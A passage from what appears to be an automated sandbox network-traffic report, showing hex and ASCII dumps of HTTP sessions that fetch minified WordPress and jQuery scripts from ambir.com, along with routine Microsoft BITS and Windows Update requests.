                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6e 3d 6e 2e 70 72 65 76 29 2e 6e 65 78 74 3d 6e 75 6c 6c 3a 69 2b 2b 2c 72 3d 73 2c 73 2e 76 61 6c 7d 72 65 74 75 72 6e 20 65 3d 65 7c 7c 7b 7d 2c 61 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21
                                                                                                                                                                                              Data Ascii: n=n.prev).next=null:i++,r=s,s.val}return e=e||{},a.clear=function(){r=null,n=null,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 69 66 28 6f 3d 74 5b 72 5d 2c 61 3d 70 5b 6f 5d 29 7b 66 6f 72 28 6e 3d 61 2e 6c 65 6e 67 74 68 2c 69 3d 41 72 72 61 79 28 6e 29 3b 6e 2d 2d 3b 29 69 5b 6e 5d 3d 6c 2e 70 6f 70 28 29 3b 74 72 79 7b 73 3d 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d
                                                                                                                                                                                              Data Ascii: if(o=t[r],a=p[o]){for(n=a.length,i=Array(n);n--;)i[n]=l.pop();try{s=a.apply(null,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d(t,e){var r;for(r in this.data=
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 20 30 2c 74 29 2c 6e 2e 64 63 6e 70 67 65 74 74 65 78 74 28 74 2c 65 2c 72 2c 69 2c 61 29 29 2c 75 3d 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 74 2c 70 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 69 3d 6c 28 6e 2c 65 2c 74 29 3b 72 65 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63
                                                                                                                                                                                              Data Ascii: 0,t),n.dcnpgettext(t,e,r,i,a)),u=(t="default")=>t,p=(t,e,n)=>{let i=l(n,e,t);return r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAc


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              27192.168.2.5497482.16.229.162443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                              2024-11-20 20:28:20 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                              X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                              Cache-Control: public, max-age=245846
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                              2024-11-20 20:28:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              28192.168.2.5497314.175.87.197443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cHrHpX4bmlX+nvl&MD=3MZpu8fr HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                              2024-11-20 20:28:20 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                              MS-CorrelationId: f08d4dd6-97e9-42f3-ae63-41c71984776b
                                                                                                                                                                                              MS-RequestId: f2b1ee6d-d27c-453a-ad9c-d73682f32a06
                                                                                                                                                                                              MS-CV: tBW1E0qX0ECGyfpC.0
                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:19 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                              2024-11-20 20:28:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                              2024-11-20 20:28:20 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              29192.168.2.549754141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC412OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-18b11"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6838
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f933d2c0fa3-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:20 UTC878INData Raw: 37 64 63 35 0d 0a 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72
                                                                                                                                                                                              Data Ascii: 7dc5/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Err
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 6e 5b 69 2e 63 61 6c 6c 28 65 29 5d 7c 7c 22 6f 62 6a 65 63 74 22 3a 74 79 70 65 6f 66 20 65 7d 76 61 72 20 74 3d 22 33 2e 37
                                                                                                                                                                                              Data Ascii: if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b 2b 29 69 66 28 6e 75 6c
                                                                                                                                                                                              Data Ascii: ush:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(nul
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75
                                                                                                                                                                                              Data Ascii: nction(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];retu
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c 78
                                                                                                                                                                                              Data Ascii: W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 6f 65 5b 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65
                                                                                                                                                                                              Data Ascii: arCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),ye.childNodes),oe[ye.childNodes.length].node
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70
                                                                                                                                                                                              Data Ascii: &&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"inp
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 43 29 7b 76 61 72 20 6e 3d 74
                                                                                                                                                                                              Data Ascii: try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&C){var n=t
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75
                                                                                                                                                                                              Data Ascii: ength||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":enabled",":disabled"),(t=T.createElement("inpu
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b 69 2b 2b 5d 29 74 3d 3d 3d 65 5b 69 5d 26 26 28 72 3d 6e 2e 70 75 73 68 28 69 29 29 3b 77 68 69 6c 65 28 72 2d 2d 29 68 65 2e 63
                                                                                                                                                                                              Data Ascii: ute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[i++])t===e[i]&&(r=n.push(i));while(r--)he.c


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              30192.168.2.549755141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC379OUTGET /wp-content/themes/ambir/js/owl.carousel.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
